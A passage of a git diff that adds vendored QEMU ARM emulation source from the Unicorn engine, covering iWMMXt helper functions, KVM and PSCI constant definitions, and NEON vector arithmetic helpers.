NZBIT16(a >> 0, 0) | NZBIT16(a >> 16, 1) | + NZBIT16(a >> 32, 2) | NZBIT16(a >> 48, 3); + return a; +} + +uint64_t HELPER(iwmmxt_packsq)(CPUARMState *env, uint64_t a, uint64_t b) +{ + a = (a & 0xffffffff) | ((b & 0xffffffff) << 32); + env->iwmmxt.cregs[ARM_IWMMXT_wCASF] = + NZBIT32(a >> 0, 0) | NZBIT32(a >> 32, 1); + return a; +} + +uint64_t HELPER(iwmmxt_muladdsl)(uint64_t c, uint32_t a, uint32_t b) +{ + return c + ((int32_t) EXTEND32(a) * (int32_t) EXTEND32(b)); +} + +uint64_t HELPER(iwmmxt_muladdsw)(uint64_t c, uint32_t a, uint32_t b) +{ + c += EXTEND32(EXTEND16S((a >> 0) & 0xffff) * + EXTEND16S((b >> 0) & 0xffff)); + c += EXTEND32(EXTEND16S((a >> 16) & 0xffff) * + EXTEND16S((b >> 16) & 0xffff)); + return c; +} + +uint64_t HELPER(iwmmxt_muladdswl)(uint64_t c, uint32_t a, uint32_t b) +{ + return c + (EXTEND32(EXTEND16S(a & 0xffff) * + EXTEND16S(b & 0xffff))); +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-arm/kvm-consts.h b/ai_anti_malware/unicorn/unicorn-master/qemu/target-arm/kvm-consts.h new file mode 100644 index 0000000..aea12f1 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-arm/kvm-consts.h @@ -0,0 +1,182 @@ +/* + * KVM ARM ABI constant definitions + * + * Copyright (c) 2013 Linaro Limited + * + * Provide versions of KVM constant defines that can be used even + * when CONFIG_KVM is not set and we don't have access to the + * KVM headers. If CONFIG_KVM is set, we do a compile-time check + * that we haven't got out of sync somehow. + * + * This work is licensed under the terms of the GNU GPL, version 2 or later. + * See the COPYING file in the top-level directory. + */ +#ifndef ARM_KVM_CONSTS_H +#define ARM_KVM_CONSTS_H + +#ifdef CONFIG_KVM +#include "qemu/compiler.h" +#include +#include + +#define MISMATCH_CHECK(X, Y) QEMU_BUILD_BUG_ON(X != Y) + +#else +#define MISMATCH_CHECK(X, Y) +#endif + +#define CP_REG_SIZE_SHIFT 52 +#define CP_REG_SIZE_MASK 0x00f0000000000000ULL +#define CP_REG_SIZE_U32 0x0020000000000000ULL +#define CP_REG_SIZE_U64 0x0030000000000000ULL +#define CP_REG_ARM 0x4000000000000000ULL +#define CP_REG_ARCH_MASK 0xff00000000000000ULL + +MISMATCH_CHECK(CP_REG_SIZE_SHIFT, KVM_REG_SIZE_SHIFT) +MISMATCH_CHECK(CP_REG_SIZE_MASK, KVM_REG_SIZE_MASK) +MISMATCH_CHECK(CP_REG_SIZE_U32, KVM_REG_SIZE_U32) +MISMATCH_CHECK(CP_REG_SIZE_U64, KVM_REG_SIZE_U64) +MISMATCH_CHECK(CP_REG_ARM, KVM_REG_ARM) +MISMATCH_CHECK(CP_REG_ARCH_MASK, KVM_REG_ARCH_MASK) + +#define QEMU_PSCI_0_1_FN_BASE 0x95c1ba5e +#define QEMU_PSCI_0_1_FN(n) (QEMU_PSCI_0_1_FN_BASE + (n)) +#define QEMU_PSCI_0_1_FN_CPU_SUSPEND QEMU_PSCI_0_1_FN(0) +#define QEMU_PSCI_0_1_FN_CPU_OFF QEMU_PSCI_0_1_FN(1) +#define QEMU_PSCI_0_1_FN_CPU_ON QEMU_PSCI_0_1_FN(2) +#define QEMU_PSCI_0_1_FN_MIGRATE QEMU_PSCI_0_1_FN(3) + +MISMATCH_CHECK(QEMU_PSCI_0_1_FN_CPU_SUSPEND, KVM_PSCI_FN_CPU_SUSPEND) +MISMATCH_CHECK(QEMU_PSCI_0_1_FN_CPU_OFF, KVM_PSCI_FN_CPU_OFF) +MISMATCH_CHECK(QEMU_PSCI_0_1_FN_CPU_ON, KVM_PSCI_FN_CPU_ON) +MISMATCH_CHECK(QEMU_PSCI_0_1_FN_MIGRATE, KVM_PSCI_FN_MIGRATE) + +#define QEMU_PSCI_0_2_FN_BASE 0x84000000 +#define QEMU_PSCI_0_2_FN(n) (QEMU_PSCI_0_2_FN_BASE + (n)) + +#define QEMU_PSCI_0_2_64BIT 0x40000000 +#define QEMU_PSCI_0_2_FN64_BASE \ + (QEMU_PSCI_0_2_FN_BASE + QEMU_PSCI_0_2_64BIT) +#define QEMU_PSCI_0_2_FN64(n) (QEMU_PSCI_0_2_FN64_BASE + (n)) + +#define QEMU_PSCI_0_2_FN_PSCI_VERSION QEMU_PSCI_0_2_FN(0) +#define QEMU_PSCI_0_2_FN_CPU_SUSPEND QEMU_PSCI_0_2_FN(1) +#define QEMU_PSCI_0_2_FN_CPU_OFF QEMU_PSCI_0_2_FN(2) +#define QEMU_PSCI_0_2_FN_CPU_ON QEMU_PSCI_0_2_FN(3) +#define QEMU_PSCI_0_2_FN_AFFINITY_INFO QEMU_PSCI_0_2_FN(4) +#define QEMU_PSCI_0_2_FN_MIGRATE QEMU_PSCI_0_2_FN(5) +#define QEMU_PSCI_0_2_FN_MIGRATE_INFO_TYPE QEMU_PSCI_0_2_FN(6) +#define QEMU_PSCI_0_2_FN_MIGRATE_INFO_UP_CPU QEMU_PSCI_0_2_FN(7) +#define QEMU_PSCI_0_2_FN_SYSTEM_OFF QEMU_PSCI_0_2_FN(8) +#define QEMU_PSCI_0_2_FN_SYSTEM_RESET QEMU_PSCI_0_2_FN(9) + +#define QEMU_PSCI_0_2_FN64_CPU_SUSPEND QEMU_PSCI_0_2_FN64(1) +#define QEMU_PSCI_0_2_FN64_CPU_OFF QEMU_PSCI_0_2_FN64(2) +#define QEMU_PSCI_0_2_FN64_CPU_ON QEMU_PSCI_0_2_FN64(3) +#define QEMU_PSCI_0_2_FN64_AFFINITY_INFO QEMU_PSCI_0_2_FN64(4) +#define QEMU_PSCI_0_2_FN64_MIGRATE QEMU_PSCI_0_2_FN64(5) + +MISMATCH_CHECK(QEMU_PSCI_0_2_FN_CPU_SUSPEND, PSCI_0_2_FN_CPU_SUSPEND) +MISMATCH_CHECK(QEMU_PSCI_0_2_FN_CPU_OFF, PSCI_0_2_FN_CPU_OFF) +MISMATCH_CHECK(QEMU_PSCI_0_2_FN_CPU_ON, PSCI_0_2_FN_CPU_ON) +MISMATCH_CHECK(QEMU_PSCI_0_2_FN_MIGRATE, PSCI_0_2_FN_MIGRATE) +MISMATCH_CHECK(QEMU_PSCI_0_2_FN64_CPU_SUSPEND, PSCI_0_2_FN64_CPU_SUSPEND) +MISMATCH_CHECK(QEMU_PSCI_0_2_FN64_CPU_ON, PSCI_0_2_FN64_CPU_ON) +MISMATCH_CHECK(QEMU_PSCI_0_2_FN64_MIGRATE, PSCI_0_2_FN64_MIGRATE) + +/* PSCI v0.2 return values used by TCG emulation of PSCI */ + +/* No Trusted OS migration to worry about when offlining CPUs */ +#define QEMU_PSCI_0_2_RET_TOS_MIGRATION_NOT_REQUIRED 2 + +/* We implement version 0.2 only */ +#define QEMU_PSCI_0_2_RET_VERSION_0_2 2 + +MISMATCH_CHECK(QEMU_PSCI_0_2_RET_TOS_MIGRATION_NOT_REQUIRED, PSCI_0_2_TOS_MP) +MISMATCH_CHECK(QEMU_PSCI_0_2_RET_VERSION_0_2, + (PSCI_VERSION_MAJOR(0) | PSCI_VERSION_MINOR(2))) + +/* PSCI return values (inclusive of all PSCI versions) */ +#define QEMU_PSCI_RET_SUCCESS 0 +#define QEMU_PSCI_RET_NOT_SUPPORTED -1 +#define QEMU_PSCI_RET_INVALID_PARAMS -2 +#define QEMU_PSCI_RET_DENIED -3 +#define QEMU_PSCI_RET_ALREADY_ON -4 +#define QEMU_PSCI_RET_ON_PENDING -5 +#define QEMU_PSCI_RET_INTERNAL_FAILURE -6 +#define QEMU_PSCI_RET_NOT_PRESENT -7 +#define QEMU_PSCI_RET_DISABLED -8 + +MISMATCH_CHECK(QEMU_PSCI_RET_SUCCESS, PSCI_RET_SUCCESS) +MISMATCH_CHECK(QEMU_PSCI_RET_NOT_SUPPORTED, PSCI_RET_NOT_SUPPORTED) +MISMATCH_CHECK(QEMU_PSCI_RET_INVALID_PARAMS, PSCI_RET_INVALID_PARAMS) +MISMATCH_CHECK(QEMU_PSCI_RET_DENIED, PSCI_RET_DENIED) +MISMATCH_CHECK(QEMU_PSCI_RET_ALREADY_ON, PSCI_RET_ALREADY_ON) +MISMATCH_CHECK(QEMU_PSCI_RET_ON_PENDING, PSCI_RET_ON_PENDING) +MISMATCH_CHECK(QEMU_PSCI_RET_INTERNAL_FAILURE, PSCI_RET_INTERNAL_FAILURE) +MISMATCH_CHECK(QEMU_PSCI_RET_NOT_PRESENT, PSCI_RET_NOT_PRESENT) +MISMATCH_CHECK(QEMU_PSCI_RET_DISABLED, PSCI_RET_DISABLED) + +/* Note that KVM uses overlapping values for AArch32 and AArch64 + * target CPU numbers. AArch32 targets: + */ +#define QEMU_KVM_ARM_TARGET_CORTEX_A15 0 +#define QEMU_KVM_ARM_TARGET_CORTEX_A7 1 + +/* AArch64 targets: */ +#define QEMU_KVM_ARM_TARGET_AEM_V8 0 +#define QEMU_KVM_ARM_TARGET_FOUNDATION_V8 1 +#define QEMU_KVM_ARM_TARGET_CORTEX_A57 2 + +/* There's no kernel define for this: sentinel value which + * matches no KVM target value for either 64 or 32 bit + */ +#define QEMU_KVM_ARM_TARGET_NONE UINT_MAX + +#ifdef TARGET_AARCH64 +MISMATCH_CHECK(QEMU_KVM_ARM_TARGET_AEM_V8, KVM_ARM_TARGET_AEM_V8) +MISMATCH_CHECK(QEMU_KVM_ARM_TARGET_FOUNDATION_V8, KVM_ARM_TARGET_FOUNDATION_V8) +MISMATCH_CHECK(QEMU_KVM_ARM_TARGET_CORTEX_A57, KVM_ARM_TARGET_CORTEX_A57) +#else +MISMATCH_CHECK(QEMU_KVM_ARM_TARGET_CORTEX_A15, KVM_ARM_TARGET_CORTEX_A15) +MISMATCH_CHECK(QEMU_KVM_ARM_TARGET_CORTEX_A7, KVM_ARM_TARGET_CORTEX_A7) +#endif + +#define CP_REG_ARM64 0x6000000000000000ULL +#define CP_REG_ARM_COPROC_MASK 0x000000000FFF0000 +#define CP_REG_ARM_COPROC_SHIFT 16 +#define CP_REG_ARM64_SYSREG (0x0013 << CP_REG_ARM_COPROC_SHIFT) +#define CP_REG_ARM64_SYSREG_OP0_MASK 0x000000000000c000 +#define CP_REG_ARM64_SYSREG_OP0_SHIFT 14 +#define CP_REG_ARM64_SYSREG_OP1_MASK 0x0000000000003800 +#define CP_REG_ARM64_SYSREG_OP1_SHIFT 11 +#define CP_REG_ARM64_SYSREG_CRN_MASK 0x0000000000000780 +#define CP_REG_ARM64_SYSREG_CRN_SHIFT 7 +#define CP_REG_ARM64_SYSREG_CRM_MASK 0x0000000000000078 +#define CP_REG_ARM64_SYSREG_CRM_SHIFT 3 +#define CP_REG_ARM64_SYSREG_OP2_MASK 0x0000000000000007 +#define CP_REG_ARM64_SYSREG_OP2_SHIFT 0 + +/* No kernel define but it's useful to QEMU */ +#define CP_REG_ARM64_SYSREG_CP (CP_REG_ARM64_SYSREG >> CP_REG_ARM_COPROC_SHIFT) + +#ifdef TARGET_AARCH64 +MISMATCH_CHECK(CP_REG_ARM64, KVM_REG_ARM64) +MISMATCH_CHECK(CP_REG_ARM_COPROC_MASK, KVM_REG_ARM_COPROC_MASK) +MISMATCH_CHECK(CP_REG_ARM_COPROC_SHIFT, KVM_REG_ARM_COPROC_SHIFT) +MISMATCH_CHECK(CP_REG_ARM64_SYSREG, KVM_REG_ARM64_SYSREG) +MISMATCH_CHECK(CP_REG_ARM64_SYSREG_OP0_MASK, KVM_REG_ARM64_SYSREG_OP0_MASK) +MISMATCH_CHECK(CP_REG_ARM64_SYSREG_OP0_SHIFT, KVM_REG_ARM64_SYSREG_OP0_SHIFT) +MISMATCH_CHECK(CP_REG_ARM64_SYSREG_OP1_MASK, KVM_REG_ARM64_SYSREG_OP1_MASK) +MISMATCH_CHECK(CP_REG_ARM64_SYSREG_OP1_SHIFT, KVM_REG_ARM64_SYSREG_OP1_SHIFT) +MISMATCH_CHECK(CP_REG_ARM64_SYSREG_CRN_MASK, KVM_REG_ARM64_SYSREG_CRN_MASK) +MISMATCH_CHECK(CP_REG_ARM64_SYSREG_CRN_SHIFT, KVM_REG_ARM64_SYSREG_CRN_SHIFT) +MISMATCH_CHECK(CP_REG_ARM64_SYSREG_CRM_MASK, KVM_REG_ARM64_SYSREG_CRM_MASK) +MISMATCH_CHECK(CP_REG_ARM64_SYSREG_CRM_SHIFT, KVM_REG_ARM64_SYSREG_CRM_SHIFT) +MISMATCH_CHECK(CP_REG_ARM64_SYSREG_OP2_MASK, KVM_REG_ARM64_SYSREG_OP2_MASK) +MISMATCH_CHECK(CP_REG_ARM64_SYSREG_OP2_SHIFT, KVM_REG_ARM64_SYSREG_OP2_SHIFT) +#endif + +#undef MISMATCH_CHECK + +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-arm/neon_helper.c b/ai_anti_malware/unicorn/unicorn-master/qemu/target-arm/neon_helper.c new file mode 100644 index 0000000..fdae9d4 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-arm/neon_helper.c @@ -0,0 +1,2243 @@ +/* + * ARM NEON vector operations. + * + * Copyright (c) 2007, 2008 CodeSourcery. + * Written by Paul Brook + * + * This code is licensed under the GNU GPL v2. + */ +#include +#include + +#include "cpu.h" +#include "exec/exec-all.h" +#include "exec/helper-proto.h" + +#define SIGNBIT (uint32_t)0x80000000 +#define SIGNBIT64 ((uint64_t)1 << 63) + +#define SET_QC() env->vfp.xregs[ARM_VFP_FPSCR] |= CPSR_Q + +#define NEON_TYPE1(name, type) \ +typedef struct \ +{ \ + type v1; \ +} neon_##name; +#ifdef HOST_WORDS_BIGENDIAN +#define NEON_TYPE2(name, type) \ +typedef struct \ +{ \ + type v2; \ + type v1; \ +} neon_##name; +#define NEON_TYPE4(name, type) \ +typedef struct \ +{ \ + type v4; \ + type v3; \ + type v2; \ + type v1; \ +} neon_##name; +#else +#define NEON_TYPE2(name, type) \ +typedef struct \ +{ \ + type v1; \ + type v2; \ +} neon_##name; +#define NEON_TYPE4(name, type) \ +typedef struct \ +{ \ + type v1; \ + type v2; \ + type v3; \ + type v4; \ +} neon_##name; +#endif + +NEON_TYPE4(s8, int8_t) +NEON_TYPE4(u8, uint8_t) +NEON_TYPE2(s16, int16_t) +NEON_TYPE2(u16, uint16_t) +NEON_TYPE1(s32, int32_t) +NEON_TYPE1(u32, uint32_t) +#undef NEON_TYPE4 +#undef NEON_TYPE2 +#undef NEON_TYPE1 + +/* Copy from a uint32_t to a vector structure type. */ +#define NEON_UNPACK(vtype, dest, val) do { \ + union { \ + vtype v; \ + uint32_t i; \ + } conv_u; \ + conv_u.i = (val); \ + dest = conv_u.v; \ + } while(0) + +/* Copy from a vector structure type to a uint32_t. */ +#define NEON_PACK(vtype, dest, val) do { \ + union { \ + vtype v; \ + uint32_t i; \ + } conv_u; \ + conv_u.v = (val); \ + dest = conv_u.i; \ + } while(0) + +#define NEON_DO1 \ + NEON_FN(vdest.v1, vsrc1.v1, vsrc2.v1); +#define NEON_DO2 \ + NEON_FN(vdest.v1, vsrc1.v1, vsrc2.v1); \ + NEON_FN(vdest.v2, vsrc1.v2, vsrc2.v2); +#define NEON_DO4 \ + NEON_FN(vdest.v1, vsrc1.v1, vsrc2.v1); \ + NEON_FN(vdest.v2, vsrc1.v2, vsrc2.v2); \ + NEON_FN(vdest.v3, vsrc1.v3, vsrc2.v3); \ + NEON_FN(vdest.v4, vsrc1.v4, vsrc2.v4); + +#define NEON_VOP_BODY(vtype, n) \ +{ \ + uint32_t res; \ + vtype vsrc1; \ + vtype vsrc2; \ + vtype vdest; \ + NEON_UNPACK(vtype, vsrc1, arg1); \ + NEON_UNPACK(vtype, vsrc2, arg2); \ + NEON_DO##n; \ + NEON_PACK(vtype, res, vdest); \ + return res; \ +} + +#define NEON_VOP(name, vtype, n) \ +uint32_t HELPER(glue(neon_,name))(uint32_t arg1, uint32_t arg2) \ +NEON_VOP_BODY(vtype, n) + +#define NEON_VOP_ENV(name, vtype, n) \ +uint32_t HELPER(glue(neon_,name))(CPUARMState *env, uint32_t arg1, uint32_t arg2) \ +NEON_VOP_BODY(vtype, n) + +/* Pairwise operations. */ +/* For 32-bit elements each segment only contains a single element, so + the elementwise and pairwise operations are the same. */ +#define NEON_PDO2 \ + NEON_FN(vdest.v1, vsrc1.v1, vsrc1.v2); \ + NEON_FN(vdest.v2, vsrc2.v1, vsrc2.v2); +#define NEON_PDO4 \ + NEON_FN(vdest.v1, vsrc1.v1, vsrc1.v2); \ + NEON_FN(vdest.v2, vsrc1.v3, vsrc1.v4); \ + NEON_FN(vdest.v3, vsrc2.v1, vsrc2.v2); \ + NEON_FN(vdest.v4, vsrc2.v3, vsrc2.v4); \ + +#define NEON_POP(name, vtype, n) \ +uint32_t HELPER(glue(neon_,name))(uint32_t arg1, uint32_t arg2) \ +{ \ + uint32_t res; \ + vtype vsrc1; \ + vtype vsrc2; \ + vtype vdest; \ + NEON_UNPACK(vtype, vsrc1, arg1); \ + NEON_UNPACK(vtype, vsrc2, arg2); \ + NEON_PDO##n; \ + NEON_PACK(vtype, res, vdest); \ + return res; \ +} + +/* Unary operators. */ +#define NEON_VOP1(name, vtype, n) \ +uint32_t HELPER(glue(neon_,name))(uint32_t arg) \ +{ \ + vtype vsrc1; \ + vtype vdest; \ + NEON_UNPACK(vtype, vsrc1, arg); \ + NEON_DO##n; \ + NEON_PACK(vtype, arg, vdest); \ + return arg; \ +} + + +#define NEON_USAT(dest, src1, src2, type) do { \ + uint32_t tmp = (uint32_t)src1 + (uint32_t)src2; \ + if (tmp != (type)tmp) { \ + SET_QC(); \ + dest = ~0; \ + } else { \ + dest = tmp; \ + }} while(0) +#define NEON_FN(dest, src1, src2) NEON_USAT(dest, src1, src2, uint8_t) +NEON_VOP_ENV(qadd_u8, neon_u8, 4) +#undef NEON_FN +#define NEON_FN(dest, src1, src2) NEON_USAT(dest, src1, src2, uint16_t) +NEON_VOP_ENV(qadd_u16, neon_u16, 2) +#undef NEON_FN +#undef NEON_USAT + +uint32_t HELPER(neon_qadd_u32)(CPUARMState *env, uint32_t a, uint32_t b) +{ + uint32_t res = a + b; + if (res < a) { + SET_QC(); + res = ~0; + } + return res; +} + +uint64_t HELPER(neon_qadd_u64)(CPUARMState *env, uint64_t src1, uint64_t src2) +{ + uint64_t res; + + res = src1 + src2; + if (res < src1) { + SET_QC(); + res = ~(uint64_t)0; + } + return res; +} + +#define NEON_SSAT(dest, src1, src2, type) do { \ + int32_t tmp = (uint32_t)src1 + (uint32_t)src2; \ + if (tmp != (type)tmp) { \ + SET_QC(); \ + if (src2 > 0) { \ + tmp = (1 << (sizeof(type) * 8 - 1)) - 1; \ + } else { \ + tmp = 1 << (sizeof(type) * 8 - 1); \ + } \ + } \ + dest = tmp; \ + } while(0) +#define NEON_FN(dest, src1, src2) NEON_SSAT(dest, src1, src2, int8_t) +NEON_VOP_ENV(qadd_s8, neon_s8, 4) +#undef NEON_FN +#define NEON_FN(dest, src1, src2) NEON_SSAT(dest, src1, src2, int16_t) +NEON_VOP_ENV(qadd_s16, neon_s16, 2) +#undef NEON_FN +#undef NEON_SSAT + +uint32_t HELPER(neon_qadd_s32)(CPUARMState *env, uint32_t a, uint32_t b) +{ + uint32_t res = a + b; + if (((res ^ a) & SIGNBIT) && !((a ^ b) & SIGNBIT)) { + SET_QC(); + res = ~(((int32_t)a >> 31) ^ SIGNBIT); + } + return res; +} + +uint64_t HELPER(neon_qadd_s64)(CPUARMState *env, uint64_t src1, uint64_t src2) +{ + uint64_t res; + + res = src1 + src2; + if (((res ^ src1) & SIGNBIT64) && !((src1 ^ src2) & SIGNBIT64)) { + SET_QC(); + res = ((int64_t)src1 >> 63) ^ ~SIGNBIT64; + } + return res; +} + +/* Unsigned saturating accumulate of signed value + * + * Op1/Rn is treated as signed + * Op2/Rd is treated as unsigned + * + * Explicit casting is used to ensure the correct sign extension of + * inputs. The result is treated as a unsigned value and saturated as such. + * + * We use a macro for the 8/16 bit cases which expects signed integers of va, + * vb, and vr for interim calculation and an unsigned 32 bit result value r. + */ + +#define USATACC(bits, shift) \ + do { \ + va = sextract32(a, shift, bits); \ + vb = extract32(b, shift, bits); \ + vr = va + vb; \ + if (vr > UINT##bits##_MAX) { \ + SET_QC(); \ + vr = UINT##bits##_MAX; \ + } else if (vr < 0) { \ + SET_QC(); \ + vr = 0; \ + } \ + r = deposit32(r, shift, bits, vr); \ + } while (0) + +uint32_t HELPER(neon_uqadd_s8)(CPUARMState *env, uint32_t a, uint32_t b) +{ + int16_t va, vb, vr; + uint32_t r = 0; + + USATACC(8, 0); + USATACC(8, 8); + USATACC(8, 16); + USATACC(8, 24); + return r; +} + +uint32_t HELPER(neon_uqadd_s16)(CPUARMState *env, uint32_t a, uint32_t b) +{ + int32_t va, vb, vr; + uint64_t r = 0; + + USATACC(16, 0); + USATACC(16, 16); + return r; +} + +#undef USATACC + +uint32_t HELPER(neon_uqadd_s32)(CPUARMState *env, uint32_t a, uint32_t b) +{ + int64_t va = (int32_t)a; + int64_t vb = (uint32_t)b; + int64_t vr = va + vb; + if (vr > UINT32_MAX) { + SET_QC(); + vr = UINT32_MAX; + } else if (vr < 0) { + SET_QC(); + vr = 0; + } + return vr; +} + +uint64_t HELPER(neon_uqadd_s64)(CPUARMState *env, uint64_t a, uint64_t b) +{ + uint64_t res; + res = a + b; + /* We only need to look at the pattern of SIGN bits to detect + * +ve/-ve saturation + */ + if (~a & b & ~res & SIGNBIT64) { + SET_QC(); + res = UINT64_MAX; + } else if (a & ~b & res & SIGNBIT64) { + SET_QC(); + res = 0; + } + return res; +} + +/* Signed saturating accumulate of unsigned value + * + * Op1/Rn is treated as unsigned + * Op2/Rd is treated as signed + * + * The result is treated as a signed value and saturated as such + * + * We use a macro for the 8/16 bit cases which expects signed integers of va, + * vb, and vr for interim calculation and an unsigned 32 bit result value r. + */ + +#define SSATACC(bits, shift) \ + do { \ + va = extract32(a, shift, bits); \ + vb = sextract32(b, shift, bits); \ + vr = va + vb; \ + if (vr > INT##bits##_MAX) { \ + SET_QC(); \ + vr = INT##bits##_MAX; \ + } else if (vr < INT##bits##_MIN) { \ + SET_QC(); \ + vr = INT##bits##_MIN; \ + } \ + r = deposit32(r, shift, bits, vr); \ + } while (0) + +uint32_t HELPER(neon_sqadd_u8)(CPUARMState *env, uint32_t a, uint32_t b) +{ + int16_t va, vb, vr; + uint32_t r = 0; + + SSATACC(8, 0); + SSATACC(8, 8); + SSATACC(8, 16); + SSATACC(8, 24); + return r; +} + +uint32_t HELPER(neon_sqadd_u16)(CPUARMState *env, uint32_t a, uint32_t b) +{ + int32_t va, vb, vr; + uint32_t r = 0; + + SSATACC(16, 0); + SSATACC(16, 16); + + return r; +} + +#undef SSATACC + +uint32_t HELPER(neon_sqadd_u32)(CPUARMState *env, uint32_t a, uint32_t b) +{ + int64_t res; + int64_t op1 = (uint32_t)a; + int64_t op2 = (int32_t)b; + res = op1 + op2; + if (res > INT32_MAX) { + SET_QC(); + res = INT32_MAX; + } else if (res < INT32_MIN) { + SET_QC(); + res = INT32_MIN; + } + return res; +} + +uint64_t HELPER(neon_sqadd_u64)(CPUARMState *env, uint64_t a, uint64_t b) +{ + uint64_t res; + res = a + b; + /* We only need to look at the pattern of SIGN bits to detect an overflow */ + if (((a & res) + | (~b & res) + | (a & ~b)) & SIGNBIT64) { + SET_QC(); + res = INT64_MAX; + } + return res; +} + + +#define NEON_USAT(dest, src1, src2, type) do { \ + uint32_t tmp = (uint32_t)src1 - (uint32_t)src2; \ + if (tmp != (type)tmp) { \ + SET_QC(); \ + dest = 0; \ + } else { \ + dest = tmp; \ + }} while(0) +#define NEON_FN(dest, src1, src2) NEON_USAT(dest, src1, src2, uint8_t) +NEON_VOP_ENV(qsub_u8, neon_u8, 4) +#undef NEON_FN +#define NEON_FN(dest, src1, src2) NEON_USAT(dest, src1, src2, uint16_t) +NEON_VOP_ENV(qsub_u16, neon_u16, 2) +#undef NEON_FN +#undef NEON_USAT + +uint32_t HELPER(neon_qsub_u32)(CPUARMState *env, uint32_t a, uint32_t b) +{ + uint32_t res = a - b; + if (res > a) { + SET_QC(); + res = 0; + } + return res; +} + +uint64_t HELPER(neon_qsub_u64)(CPUARMState *env, uint64_t src1, uint64_t src2) +{ + uint64_t res; + + if (src1 < src2) { + SET_QC(); + res = 0; + } else { + res = src1 - src2; + } + return res; +} + +#define NEON_SSAT(dest, src1, src2, type) do { \ + int32_t tmp = (uint32_t)src1 - (uint32_t)src2; \ + if (tmp != (type)tmp) { \ + SET_QC(); \ + if (src2 < 0) { \ + tmp = (1 << (sizeof(type) * 8 - 1)) - 1; \ + } else { \ + tmp = 1 << (sizeof(type) * 8 - 1); \ + } \ + } \ + dest = tmp; \ + } while(0) +#define NEON_FN(dest, src1, src2) NEON_SSAT(dest, src1, src2, int8_t) +NEON_VOP_ENV(qsub_s8, neon_s8, 4) +#undef NEON_FN +#define NEON_FN(dest, src1, src2) NEON_SSAT(dest, src1, src2, int16_t) +NEON_VOP_ENV(qsub_s16, neon_s16, 2) +#undef NEON_FN +#undef NEON_SSAT + +uint32_t HELPER(neon_qsub_s32)(CPUARMState *env, uint32_t a, uint32_t b) +{ + uint32_t res = a - b; + if (((res ^ a) & SIGNBIT) && ((a ^ b) & SIGNBIT)) { + SET_QC(); + res = ~(((int32_t)a >> 31) ^ SIGNBIT); + } + return res; +} + +uint64_t HELPER(neon_qsub_s64)(CPUARMState *env, uint64_t src1, uint64_t src2) +{ + uint64_t res; + + res = src1 - src2; + if (((res ^ src1) & SIGNBIT64) && ((src1 ^ src2) & SIGNBIT64)) { + SET_QC(); + res = ((int64_t)src1 >> 63) ^ ~SIGNBIT64; + } + return res; +} + +#define NEON_FN(dest, src1, src2) dest = (src1 + src2) >> 1 +NEON_VOP(hadd_s8, neon_s8, 4) +NEON_VOP(hadd_u8, neon_u8, 4) +NEON_VOP(hadd_s16, neon_s16, 2) +NEON_VOP(hadd_u16, neon_u16, 2) +#undef NEON_FN + +int32_t HELPER(neon_hadd_s32)(int32_t src1, int32_t src2) +{ + int32_t dest; + + dest = (src1 >> 1) + (src2 >> 1); + if (src1 & src2 & 1) + dest++; + return dest; +} + +uint32_t HELPER(neon_hadd_u32)(uint32_t src1, uint32_t src2) +{ + uint32_t dest; + + dest = (src1 >> 1) + (src2 >> 1); + if (src1 & src2 & 1) + dest++; + return dest; +} + +#define NEON_FN(dest, src1, src2) dest = (src1 + src2 + 1) >> 1 +NEON_VOP(rhadd_s8, neon_s8, 4) +NEON_VOP(rhadd_u8, neon_u8, 4) +NEON_VOP(rhadd_s16, neon_s16, 2) +NEON_VOP(rhadd_u16, neon_u16, 2) +#undef NEON_FN + +int32_t HELPER(neon_rhadd_s32)(int32_t src1, int32_t src2) +{ + int32_t dest; + + dest = (src1 >> 1) + (src2 >> 1); + if ((src1 | src2) & 1) + dest++; + return dest; +} + +uint32_t HELPER(neon_rhadd_u32)(uint32_t src1, uint32_t src2) +{ + uint32_t dest; + + dest = (src1 >> 1) + (src2 >> 1); + if ((src1 | src2) & 1) + dest++; + return dest; +} + +#define NEON_FN(dest, src1, src2) dest = (src1 - src2) >> 1 +NEON_VOP(hsub_s8, neon_s8, 4) +NEON_VOP(hsub_u8, neon_u8, 4) +NEON_VOP(hsub_s16, neon_s16, 2) +NEON_VOP(hsub_u16, neon_u16, 2) +#undef NEON_FN + +int32_t HELPER(neon_hsub_s32)(int32_t src1, int32_t src2) +{ + int32_t dest; + + dest = (src1 >> 1) - (src2 >> 1); + if ((~src1) & src2 & 1) + dest--; + return dest; +} + +uint32_t HELPER(neon_hsub_u32)(uint32_t src1, uint32_t src2) +{ + uint32_t dest; + + dest = (src1 >> 1) - (src2 >> 1); + if ((~src1) & src2 & 1) + dest--; + return dest; +} + +#define NEON_FN(dest, src1, src2) dest = (src1 > src2) ? ~0 : 0 +NEON_VOP(cgt_s8, neon_s8, 4) +NEON_VOP(cgt_u8, neon_u8, 4) +NEON_VOP(cgt_s16, neon_s16, 2) +NEON_VOP(cgt_u16, neon_u16, 2) +NEON_VOP(cgt_s32, neon_s32, 1) +NEON_VOP(cgt_u32, neon_u32, 1) +#undef NEON_FN + +#define NEON_FN(dest, src1, src2) dest = (src1 >= src2) ? ~0 : 0 +NEON_VOP(cge_s8, neon_s8, 4) +NEON_VOP(cge_u8, neon_u8, 4) +NEON_VOP(cge_s16, neon_s16, 2) +NEON_VOP(cge_u16, neon_u16, 2) +NEON_VOP(cge_s32, neon_s32, 1) +NEON_VOP(cge_u32, neon_u32, 1) +#undef NEON_FN + +#define NEON_FN(dest, src1, src2) dest = (src1 < src2) ? src1 : src2 +NEON_VOP(min_s8, neon_s8, 4) +NEON_VOP(min_u8, neon_u8, 4) +NEON_VOP(min_s16, neon_s16, 2) +NEON_VOP(min_u16, neon_u16, 2) +NEON_VOP(min_s32, neon_s32, 1) +NEON_VOP(min_u32, neon_u32, 1) +NEON_POP(pmin_s8, neon_s8, 4) +NEON_POP(pmin_u8, neon_u8, 4) +NEON_POP(pmin_s16, neon_s16, 2) +NEON_POP(pmin_u16, neon_u16, 2) +#undef NEON_FN + +#define NEON_FN(dest, src1, src2) dest = (src1 > src2) ? src1 : src2 +NEON_VOP(max_s8, neon_s8, 4) +NEON_VOP(max_u8, neon_u8, 4) +NEON_VOP(max_s16, neon_s16, 2) +NEON_VOP(max_u16, neon_u16, 2) +NEON_VOP(max_s32, neon_s32, 1) +NEON_VOP(max_u32, neon_u32, 1) +NEON_POP(pmax_s8, neon_s8, 4) 